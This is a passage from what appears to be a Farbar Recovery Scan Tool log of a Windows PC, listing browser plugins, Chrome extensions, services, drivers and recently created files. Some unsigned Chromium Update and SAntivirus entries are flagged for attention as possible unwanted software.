FF Plugin-x32: @chbrowserupdate.com/Chromium Update;version=3 -> C:\Program Files (x86)\Chromium\Update\1.3.99.0\npChromiumUpdate3.dll [2020-03-03] (Chromium.) [File not signed]
FF Plugin-x32: @chbrowserupdate.com/Chromium Update;version=9 -> C:\Program Files (x86)\Chromium\Update\1.3.99.0\npChromiumUpdate3.dll [2020-03-03] (Chromium.) [File not signed]
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.fdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xdp -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @foxitsoftware.com/Foxit PhantomPDF Plugin,version=1.0,application/vnd.xfdf -> C:\Program Files (x86)\Foxit PhantomPDF\plugins\npFoxitPhantomPDFPlugin.dll [2014-10-20] (Foxit Software Incorporated -> Foxit Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.68 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2015-08-24] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2015-08-24] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> C:\Program Files (x86)\McAfee\msc\npMcSnFFPl.dll [No File]
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-03-05] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default [2020-04-29]
CHR Notifications: Default -> hxxps://www.pinterest.com
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Extension: (Slides) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-10-14]
CHR Extension: (Docs) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-10-14]
CHR Extension: (Google Drive) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-24]
CHR Extension: (YouTube) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-24]
CHR Extension: (Lifesize Guest) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\cgmegfmapkpchpakidcpkjdhpobgeoeo [2020-03-26]
CHR Extension: (Games Lol) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjhnafljmcojokjmijlinlamlhcdndhg [2020-03-03]
CHR Extension: (uBlock Origin) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2020-02-07]
CHR Extension: (Google Search) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-06-22]
CHR Extension: (Sheets) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-10-14]
CHR Extension: (Google Docs Offline) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-03-11]
CHR Extension: (Search Selector) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\iicdcmjmlnliniifciehlchmdepfndfn [2020-03-12]
CHR Extension: (Chrome Web Store Payments) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-03]
CHR Extension: (Gmail) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-26]
CHR Extension: (Chrome Media Router) - C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-02]
CHR Profile: C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\Guest Profile [2020-01-11]
CHR Profile: C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\System Profile [2020-01-11]
CHR HKLM\...\Chrome\Extension: [bhdinjalofclbacjijgifpahcnjapclb]
CHR HKLM\...\Chrome\Extension: [iicdcmjmlnliniifciehlchmdepfndfn]
CHR HKU\S-1-5-21-3444092895-3226993445-944412456-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhdinjalofclbacjijgifpahcnjapclb]
CHR HKU\S-1-5-21-3444092895-3226993445-944412456-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [iicdcmjmlnliniifciehlchmdepfndfn]
CHR HKLM-x32\...\Chrome\Extension: [bhdinjalofclbacjijgifpahcnjapclb]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [iicdcmjmlnliniifciehlchmdepfndfn]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

"SAntivirusIC" => service was unlocked. <==== ATTENTION

S2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [96056 2020-03-12] (Apple Inc. -> Apple Inc.)
S2 AVG Antivirus; C:\Program Files\AVG\Antivirus\AVGSvc.exe [345960 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 avgbIDSAgent; C:\Program Files\AVG\Antivirus\aswidsagent.exe [5552064 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 AvgWscReporter; C:\Program Files\AVG\Antivirus\wsc_proxy.exe [110608 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 chromium; C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
S3 chromiumm; C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
S2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [44552 2020-04-14] (Dropbox, Inc -> Dropbox, Inc.)
S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [378744 2020-03-31] (HP Inc. -> HP Inc.)
S2 HPTouchpointAnalyticsService; C:\Program Files\HP\HP Touchpoint Analytics Client\TouchpointAnalyticsClientService.exe [332216 2017-11-21] (HP Inc. -> HP Inc.)
S2 ibtsiva; C:\WINDOWS\system32\ibtsiva.exe [184064 2017-03-09] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
S2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [370560 2018-09-19] (Intel Corporation -> Intel Corporation)
S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [881152 2015-05-22] (Intel® Trusted Connect Service -> Intel® Corporation)
S3 Intel® Security Assist; C:\Program Files (x86)\Intel\Intel® Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [File not signed]
S2 IntelUSBoverIP; C:\Program Files\Intel Corporation\USB over IP\bin\UoipService.exe [394184 2014-10-15] (Intel® Wireless Display -> Intel)
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel® Security Assist\isaHelperService.exe [7680 2015-05-19] () [File not signed]
S3 iumsvc; C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [177376 2016-08-12] (Intel® Update Manager -> Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [207648 2015-10-16] (Intel Corporation - Embedded Subsystems and IP Blocks Group -> Intel Corporation)
S2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [398184 2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
S2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [682344 2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [310880 2018-09-05] (Intel Corporation -> )
S2 omniserv; C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe [103424 2015-01-30] (Softex Inc.) [File not signed]
S2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [902112 2015-12-14] (McAfee, Inc. -> Intel Security, Inc.)
S2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [389896 2014-04-14] (CyberLink Corp. -> )
S2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [316152 2016-03-29] (Realtek Semiconductor Corp -> Realtek Semiconductor)
S2 SAntivirusIC; C:\Program Files (x86)\SAntivirus\SAntivirusIC.exe [7053808 2020-02-14] (Digital Communications Inc -> Digital Com. Inc) <==== ATTENTION
S2 SAntivirusSvc; C:\Program Files (x86)\SAntivirus\SAntivirusService.exe [163312 2020-03-03] (Digital Communications Inc -> Digital Com. Incorporated) <==== ATTENTION
S2 Seagate Dashboard Services; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.DASWindowsService.exe [16120 2017-05-10] (Seagate Technology LLC -> Seagate Technology LLC)
S2 Seagate MobileBackup Service; C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\MobileService.exe [143560 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
S2 Unchecky; C:\Program Files (x86)\Unchecky\bin\unchecky_svc.exe [297240 2018-04-08] (Reason Software Company Inc. -> Reason Software Company Inc.)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2001.10-0\NisSrv.exe [3285864 2020-02-27] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2001.10-0\MsMpEng.exe [103168 2020-02-27] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [4059744 2018-09-05] (Intel Corporation -> Intel® Corporation)
S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Video Converter Ultimate\Transfer\DriverInstall.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R0 avgArDisk; C:\WINDOWS\System32\drivers\avgArDisk.sys [37960 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgArPot; C:\WINDOWS\System32\drivers\avgArPot.sys [206672 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgbidsdriver; C:\WINDOWS\System32\drivers\avgbidsdriver.sys [234840 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgbidsh; C:\WINDOWS\System32\drivers\avgbidsh.sys [179032 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgbuniv; C:\WINDOWS\System32\drivers\avgbuniv.sys [61272 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgElam; C:\WINDOWS\System32\drivers\avgElam.sys [16520 2020-03-03] (Microsoft Windows Early Launch Anti-malware Publisher -> AVG Technologies CZ, s.r.o.)
R1 avgKbd; C:\WINDOWS\System32\drivers\avgKbd.sys [43568 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 avgMonFlt; C:\WINDOWS\System32\drivers\avgMonFlt.sys [175984 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\WINDOWS\System32\drivers\avgRdr2.sys [110064 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgRvrt; C:\WINDOWS\System32\drivers\avgRvrt.sys [85664 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgSnx; C:\WINDOWS\System32\drivers\avgSnx.sys [852392 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S1 avgSP; C:\WINDOWS\System32\drivers\avgSP.sys [459992 2020-04-16] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S2 avgStm; C:\WINDOWS\System32\drivers\avgStm.sys [235768 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S0 avgVmm; C:\WINDOWS\System32\drivers\avgVmm.sys [317864 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2019-09-10] (Microsoft Corporation) [File not signed]
S3 ibtusb; C:\WINDOWS\system32\DRIVERS\ibtusb.sys [230656 2017-03-09] (Intel Corporation-Wireless Connectivity Solutions -> Intel Corporation)
S3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [24176 2012-12-14] (Malwarebytes Corporation -> Malwarebytes Corporation) [File not signed]
R3 NETwNb64; C:\WINDOWS\system32\DRIVERS\Netwbw02.sys [3595472 2018-10-12] (Intel® Wireless Connectivity Solutions -> Intel Corporation)
R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [896752 2015-08-07] (Realtek Semiconductor Corp -> Realtek )
R3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [402136 2016-10-20] (Realtek Semiconductor Corp -> Realsil Semiconductor Corporation)
S1 SANTIVIRUSKD; C:\Program Files (x86)\SAntivirus\SAntivirusKD.sys [90096 2020-03-03] (Digital Communications Inc. -> Digital Comm. Inc) <==== ATTENTION
S3 usb3Hub; C:\WINDOWS\System32\drivers\usb3Hub.sys [213296 2014-10-15] (Intel® Wireless Display -> Windows ® Win 7 DDK provider)
S3 WdBoot; C:\WINDOWS\system32\drivers\wd\WdBoot.sys [45960 2020-02-27] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\wd\WdFilter.sys [376544 2020-02-27] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [53984 2020-02-27] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-04-29 12:14 - 2020-04-29 12:16 - 000000000 ____D C:\FRST
2020-04-29 12:14 - 2020-04-29 12:15 - 000000000 ____D C:\Users\JLO Squared\Desktop\New folder
2020-04-29 12:11 - 2020-04-29 12:12 - 000000000 ____D C:\Users\JLO Squared\AppData\Local\TeamViewer
2020-04-29 12:10 - 2020-04-29 12:10 - 018215008 _____ (TeamViewer) C:\Users\JLO Squared\Downloads\TeamViewerQS.exe
2020-04-29 12:08 - 2020-04-29 12:08 - 000118472 _____ C:\WINDOWS\ntbtlog.txt
2020-04-29 12:08 - 2020-04-29 12:08 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2020-04-29 12:06 - 2020-04-29 12:06 - 000000000 _____ C:\WINDOWS\system32\last.dump
2020-04-18 00:22 - 2020-04-29 12:00 - 000000000 ____D C:\Users\TEMP.Office
2020-04-17 18:09 - 2020-04-17 18:09 - 000321536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbadmin.exe
2020-04-17 18:09 - 2020-04-17 18:09 - 000179200 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.XamlHost.dll
2020-04-17 18:09 - 2020-04-17 18:09 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.XamlHost.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 025444352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 019850240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 019812864 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 018027520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 008013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 007756800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 007017472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 005910016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 004611584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 004129624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 003512320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 002951832 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 002800640 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSAT.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 002494744 _____ (Microsoft Corporation) C:\WINDOWS\system32\msmpeg2vdec.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 002180408 _____ (Microsoft Corporation) C:\WINDOWS\system32\workfolderssvc.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001870408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001610240 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001545216 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstsc.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 001310720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001264640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 001013000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000983040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000835584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkfoldersControl.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000686080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000529408 _____ (Microsoft Corporation) C:\WINDOWS\system32\nltest.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 000525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000456192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2020-04-17 18:08 - 2020-04-17 18:08 - 000452096 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpclip.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 000444416 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000420152 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000380416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000353792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000341504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msexcl40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msltus40.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000225792 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFoldersShell.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000187392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iasrad.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srumsvc.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\system32\WorkFolders.exe
2020-04-17 18:08 - 2020-04-17 18:08 - 000090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\tsgqec.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000070144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tsgqec.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000066048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iasacct.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srumapi.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000040448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iaspolcy.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-04-17 18:08 - 2020-04-17 18:08 - 000023552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ias.dll
2020-04-17 18:07 - 2020-04-17 18:08 - 022636544 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 014818816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 006523048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 005040640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 004538880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 003753472 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 003742544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 002800128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-04-17 18:07 - 2020-04-17 18:07 - 001835008 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001729024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallService.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001697792 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001665216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001664896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001646048 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001587712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001484384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001477112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001458688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001413840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001397576 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 001368576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wpc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001368576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Input.Inking.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001245184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBroker.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001081856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Vpn.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001077064 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2020-04-17 18:07 - 2020-04-17 18:07 - 001055376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001009152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 001008128 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000993280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2020-04-17 18:07 - 2020-04-17 18:07 - 000923136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
